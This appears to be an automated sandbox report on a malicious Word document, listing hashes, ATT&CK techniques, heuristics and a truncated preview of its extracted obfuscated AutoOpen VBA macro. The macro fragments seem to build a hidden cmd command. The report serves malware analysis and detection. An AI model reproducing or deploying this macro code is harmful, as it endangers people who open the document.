Office (OLE) malware analysis — malicious · a060bf95e5f8a009

MALICIOUS

Office (OLE)

129.4 KB Created: 2018-09-26 15:00:00 Authoring application: Microsoft Office Word First seen: 2019-08-04

MD5: 90f325ed94ade7306194683e7332551c SHA-1: 9de9e8db8580eb408f5ae169abce261b1dd813f9 SHA-256: a060bf95e5f8a009059ea545dd03c463a6a0af580444129c987a35caddf7e993

122 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious OLE document containing a legacy WordBasic AutoOpen macro. The macro is heavily obfuscated, making it difficult to determine its exact function, but its presence and the 'OLE_LEGACY_WORDBASIC_AUTOEXEC' heuristic strongly suggest malicious intent. The large slack space in the OLE structure is also a suspicious indicator. The primary IOC is the macro filename itself.

Heuristics 5

OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 132,480 bytes but its declared streams total only 36,533 bytes — 95,947 bytes (72%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 23276 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	23276 bytes
SHA-256: `bb8f301360e61e2053665b29c683daba060c9c301995654b510fbddbfccef61d`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "isAZnTMVqjUrL" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() Dim DzncOb(2) DzncOb(0) = MidB(BGWcsR + CwhErJlBlURMIEEPjjrQ + MtOiCqu, 190, 18) + Left(HwmFpCb + AIsUnnBXYLiiEvGwv + MXHbF, 354) DzncOb(1) = Left(iPnGkEAu + CsmcawnHBuvdhhVMLSVsdt + OjZDAOUs, 627) + Mid(wLoaKIw + GYqIihfhAIiivhzuhI + YLYBX, 851, 201) + Left(KIopsQY + IKfMCSJicKECdSzFjIT + dXVMiD, 325) + MidB(zAiVLJG + NhYaIXSZTSmaOjiwzjbL + EdmBHnz, 772, 15) Dim EAQdRb(1) EAQdRb(0) = MidB(ERmwru + DKitlHPiwslGOcJnwJOTVH + sBHQRnp, 722, 224) + Left(szkmQUj + ppPGiniorNZXcFjazQ + SNRpMX, 970) Dim zXbwjr(1) zXbwjr(0) = Left(IHaPcAwm + XtzNvZzzIEpbjCDQkd + oPZHq, 237) + MidB(OHunjq + CwjkHjTuAZztVkmIwWRJkv + hhsjMQbO, 775, 882) Dim FvtMqm(1) FvtMqm(0) = Mid(tXivtio + mwoUtmwQMhRGznDCcF + iLzJzzpi, 535, 430) + MidB(vFiLJ + ZZjKmQvFimcfGJwcz + iFvcuWu, 176, 843) + MidB(ttYBBKh + kzptzuwVPhvHbOJhtBwm + lacEHlvP, 49, 823) + Right(BdMcvn + mmvhaBzpznMvHRtNdm + HHLNf, 403) Dim mcrCmB(2) mcrCmB(0) = MidB(AHzUs + XMJKoIXtYztRRptazW + qEwPwJ, 616, 941) + MidB(XSzOnK + jiipHQavHaRtXpGptajj + ZtzbwC, 672, 950) mcrCmB(1) = Left(DqAwiWW + WIaAcHhUkozwDSuzzErT + mBSKGWD, 427) + MidB(OwtWT + ONunFmNMbXOUiQqFdWN + dqwDjcY, 608, 968) + MidB(GPwjOjw + jHnbZidfXwAzJKiijDrPkA + TJqta, 369, 349) + Right(DXdBzs + ldGFmSaRLrpsrjKVXdX + FpLRAcj, 211) jCsahquHk (KeyString(DOqoPdzG + KqGcfJ + 20 + 15 + 32 + mVnwEBl + jTwakz) + QGIQzOf + TwviIpt + KeyString(UEEJpD + Qnrza + 23 + 17 + 37 + wODmKoG + XioWn) + fdkIw + IbZwWdaEsLJ + VABcR + dSIbdF + RwXzbjAYTdW + IGwFlKbaqw + kmrCBU + KiIwf + VjvaCCW) Dim PFKBa(1) PFKBa(0) = MidB(GhnZOZ + ZtfCMrOWPstqFBrLPPGEh + BRrWP, 910, 269) + Right(JXTHK + omiFiAfnXOGPTpDpzkzAwf + sjRkA, 280) + Left(SzGbAl + rjHBhUZDUDsollwnCWn + dBWwlcoM, 557) + Mid(QYYXY + jfLtcjNhEwFMESjzbqbj + XdVAjY, 275, 911) Dim itUJUW(2) itUJUW(0) = MidB(aXNjVS + ZkZGhcIPBcvwvMsHtIL + ziTZjTC, 329, 152) + MidB(iSkRLR + TuDRiaRTKnBORvHCZvzLnqT + bbwcwRA, 684, 911) + MidB(zRzZGUI + WcOLOzTjQaOHAOLEwRLM + CHwZES, 662, 198) + MidB(zMkNK + AfmVsdHsJDMvKwLfBui + EAjsndzu, 566, 711) itUJUW(1) = Left(DtJdoAM + zLwjnnBSmWhtQslOLJjK + VDCBMtR, 781) + MidB(pkJAp + LwpzJcjZPwzVzzRkz + sEsfJ, 47, 254) + Mid(YPtYLKj + kVmiTrsomJiFwmFHiSPTUi + bqpnQFK, 292, 154) + MidB(lBmQNa + TSHSEbhHUCSJRDzzscv + mswFrCB, 860, 473) Dim PTXkN(2) PTXkN(0) = MidB(CuFANs + NOaCaXdfMaVqFtZmuz + lEEtnY, 732, 595) + MidB(VonSVA + qsYnShwwGoGwXhwWizEthU + RfrXYD, 318, 133) PTXkN(1) = Right(wlXwLcfq + zGndWijmwqSfvFiP + RuIpNwi, 735) + Left(qUqXKr + uzkUojZLRPWwbjMinJfW + kzwVn, 404) Dim jjjYq(1) jjjYq(0) = MidB(JkOXE + IAqbfwFziFDrjjKfwjjoH + mRvcrSZX, 860, 667) + Left(PiBjMFT + YaEiNZFOMjUpLnmmdUnAzz + wzXjoTzO, 838) End Sub Attribute VB_Name = "hUEwwFIJnmQWF" Function fdkIw() awcJzutpjwn = "d / // /\\ \\/" + "\ /V/C" + """" + "set *+=2a" + "70 720a 2a70 720a " + "a207 207a 20a7 0" + "a27 7a02 2a70" + " 02a7 02a7 " bKfWnNTdbzj = "072a 072a a7" + "02 70a2 270a 720a}7" + "20a}02a7{0a27" Dim KYCRhJ(1) KYCRhJ(0) = MidB(uAofSli + rDdRIHHRUAlOpwbLaqbWk + tJfJF, 101, 801) + MidB(zRVCRaJP + vfLljVWSZPhGOTcIOv + uGhbY, 894, 7) + Left(hRqWi + nuiXffPZwDGjHaYziwulcS + zbqjf, 903) + Left(TMYdOq + brtAEHszQtAsJGFPzzMXLD + LasCo, 816) Dim moMZj(2) moMZj(0) = MidB(GaXFO + rowmmEsjYDGonOHz + ElANFTAH, 545, 761) + MidB(oFzsU + nzclijDSmIwQnDvZjs + GkwaaBo, 916, 889) + Left(YwczWmZ + UTopiaSwuuSkMVAFCdqOTiD + DZmHc, 402) + MidB(vHrziszz + omGzonMEiEVLHtWIm + whEaHF, 378, 720) moMZj(1) = Right(iKOcEE + nPQliavMbzcqwiZpOfNtTmpn + jColJw, 501) + MidB(wiivR + OYkjpmiWUaWwnvvEZKrh + afaPj, 685, 920) + Right(YQDUawY + oYDCLFjANScWqkHDumki + acjaUI, 18) + Mid(saAYTVY + iiEBaSsoUkbEmkcHJfE + uzKbroiV, 739, 20) jKwdnEswG = "h072ac0a72t2a07a72a" + "0c20a7}70a2;a2" + "70k702aa270ae0a7" + "2r07a2b7a02;a270V" + "02a7z207aE" + "2a07$2a07 0a27m7" ... (truncated)

SHA-256: bb8f301360e61e2053665b29c683daba060c9c301995654b510fbddbfccef61d

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "isAZnTMVqjUrL"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim DzncOb(2)
DzncOb(0) = MidB(BGWcsR + CwhErJlBlURMIEEPjjrQ + MtOiCqu, 190, 18) + Left(HwmFpCb + AIsUnnBXYLiiEvGwv + MXHbF, 354)
DzncOb(1) = Left(iPnGkEAu + CsmcawnHBuvdhhVMLSVsdt + OjZDAOUs, 627) + Mid(wLoaKIw + GYqIihfhAIiivhzuhI + YLYBX, 851, 201) + Left(KIopsQY + IKfMCSJicKECdSzFjIT + dXVMiD, 325) + MidB(zAiVLJG + NhYaIXSZTSmaOjiwzjbL + EdmBHnz, 772, 15)
   Dim EAQdRb(1)
EAQdRb(0) = MidB(ERmwru + DKitlHPiwslGOcJnwJOTVH + sBHQRnp, 722, 224) + Left(szkmQUj + ppPGiniorNZXcFjazQ + SNRpMX, 970)
   Dim zXbwjr(1)
zXbwjr(0) = Left(IHaPcAwm + XtzNvZzzIEpbjCDQkd + oPZHq, 237) + MidB(OHunjq + CwjkHjTuAZztVkmIwWRJkv + hhsjMQbO, 775, 882)
   Dim FvtMqm(1)
FvtMqm(0) = Mid(tXivtio + mwoUtmwQMhRGznDCcF + iLzJzzpi, 535, 430) + MidB(vFiLJ + ZZjKmQvFimcfGJwcz + iFvcuWu, 176, 843) + MidB(ttYBBKh + kzptzuwVPhvHbOJhtBwm + lacEHlvP, 49, 823) + Right(BdMcvn + mmvhaBzpznMvHRtNdm + HHLNf, 403)
   Dim mcrCmB(2)
mcrCmB(0) = MidB(AHzUs + XMJKoIXtYztRRptazW + qEwPwJ, 616, 941) + MidB(XSzOnK + jiipHQavHaRtXpGptajj + ZtzbwC, 672, 950)
mcrCmB(1) = Left(DqAwiWW + WIaAcHhUkozwDSuzzErT + mBSKGWD, 427) + MidB(OwtWT + ONunFmNMbXOUiQqFdWN + dqwDjcY, 608, 968) + MidB(GPwjOjw + jHnbZidfXwAzJKiijDrPkA + TJqta, 369, 349) + Right(DXdBzs + ldGFmSaRLrpsrjKVXdX + FpLRAcj, 211)
jCsahquHk (KeyString(DOqoPdzG + KqGcfJ + 20 + 15 + 32 + mVnwEBl + jTwakz) + QGIQzOf + TwviIpt + KeyString(UEEJpD + Qnrza + 23 + 17 + 37 + wODmKoG + XioWn) + fdkIw + IbZwWdaEsLJ + VABcR + dSIbdF + RwXzbjAYTdW + IGwFlKbaqw + kmrCBU + KiIwf + VjvaCCW)
   Dim PFKBa(1)
PFKBa(0) = MidB(GhnZOZ + ZtfCMrOWPstqFBrLPPGEh + BRrWP, 910, 269) + Right(JXTHK + omiFiAfnXOGPTpDpzkzAwf + sjRkA, 280) + Left(SzGbAl + rjHBhUZDUDsollwnCWn + dBWwlcoM, 557) + Mid(QYYXY + jfLtcjNhEwFMESjzbqbj + XdVAjY, 275, 911)
   Dim itUJUW(2)
itUJUW(0) = MidB(aXNjVS + ZkZGhcIPBcvwvMsHtIL + ziTZjTC, 329, 152) + MidB(iSkRLR + TuDRiaRTKnBORvHCZvzLnqT + bbwcwRA, 684, 911) + MidB(zRzZGUI + WcOLOzTjQaOHAOLEwRLM + CHwZES, 662, 198) + MidB(zMkNK + AfmVsdHsJDMvKwLfBui + EAjsndzu, 566, 711)
itUJUW(1) = Left(DtJdoAM + zLwjnnBSmWhtQslOLJjK + VDCBMtR, 781) + MidB(pkJAp + LwpzJcjZPwzVzzRkz + sEsfJ, 47, 254) + Mid(YPtYLKj + kVmiTrsomJiFwmFHiSPTUi + bqpnQFK, 292, 154) + MidB(lBmQNa + TSHSEbhHUCSJRDzzscv + mswFrCB, 860, 473)
   Dim PTXkN(2)
PTXkN(0) = MidB(CuFANs + NOaCaXdfMaVqFtZmuz + lEEtnY, 732, 595) + MidB(VonSVA + qsYnShwwGoGwXhwWizEthU + RfrXYD, 318, 133)
PTXkN(1) = Right(wlXwLcfq + zGndWijmwqSfvFiP + RuIpNwi, 735) + Left(qUqXKr + uzkUojZLRPWwbjMinJfW + kzwVn, 404)
   Dim jjjYq(1)
jjjYq(0) = MidB(JkOXE + IAqbfwFziFDrjjKfwjjoH + mRvcrSZX, 860, 667) + Left(PiBjMFT + YaEiNZFOMjUpLnmmdUnAzz + wzXjoTzO, 838)
End Sub


Attribute VB_Name = "hUEwwFIJnmQWF"
Function fdkIw()
awcJzutpjwn = "d / // /\\ \\/" + "\ /V/C" + """" + "set *+=2a" + "70 720a 2a70 720a " + "a207 207a 20a7 0" + "a27 7a02 2a70" + " 02a7 02a7 "
bKfWnNTdbzj = "072a 072a a7" + "02 70a2 270a 720a}7" + "20a}02a7{0a27"
Dim KYCRhJ(1)
KYCRhJ(0) = MidB(uAofSli + rDdRIHHRUAlOpwbLaqbWk + tJfJF, 101, 801) + MidB(zRVCRaJP + vfLljVWSZPhGOTcIOv + uGhbY, 894, 7) + Left(hRqWi + nuiXffPZwDGjHaYziwulcS + zbqjf, 903) + Left(TMYdOq + brtAEHszQtAsJGFPzzMXLD + LasCo, 816)
   Dim moMZj(2)
moMZj(0) = MidB(GaXFO + rowmmEsjYDGonOHz + ElANFTAH, 545, 761) + MidB(oFzsU + nzclijDSmIwQnDvZjs + GkwaaBo, 916, 889) + Left(YwczWmZ + UTopiaSwuuSkMVAFCdqOTiD + DZmHc, 402) + MidB(vHrziszz + omGzonMEiEVLHtWIm + whEaHF, 378, 720)
moMZj(1) = Right(iKOcEE + nPQliavMbzcqwiZpOfNtTmpn + jColJw, 501) + MidB(wiivR + OYkjpmiWUaWwnvvEZKrh + afaPj, 685, 920) + Right(YQDUawY + oYDCLFjANScWqkHDumki + acjaUI, 18) + Mid(saAYTVY + iiEBaSsoUkbEmkcHJfE + uzKbroiV, 739, 20)
jKwdnEswG = "h072ac0a72t2a07a72a" + "0c20a7}70a2;a2" + "70k702aa270ae0a7" + "2r07a2b7a02;a270V" + "02a7z207aE" + "2a07$2a07 0a27m7"

... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.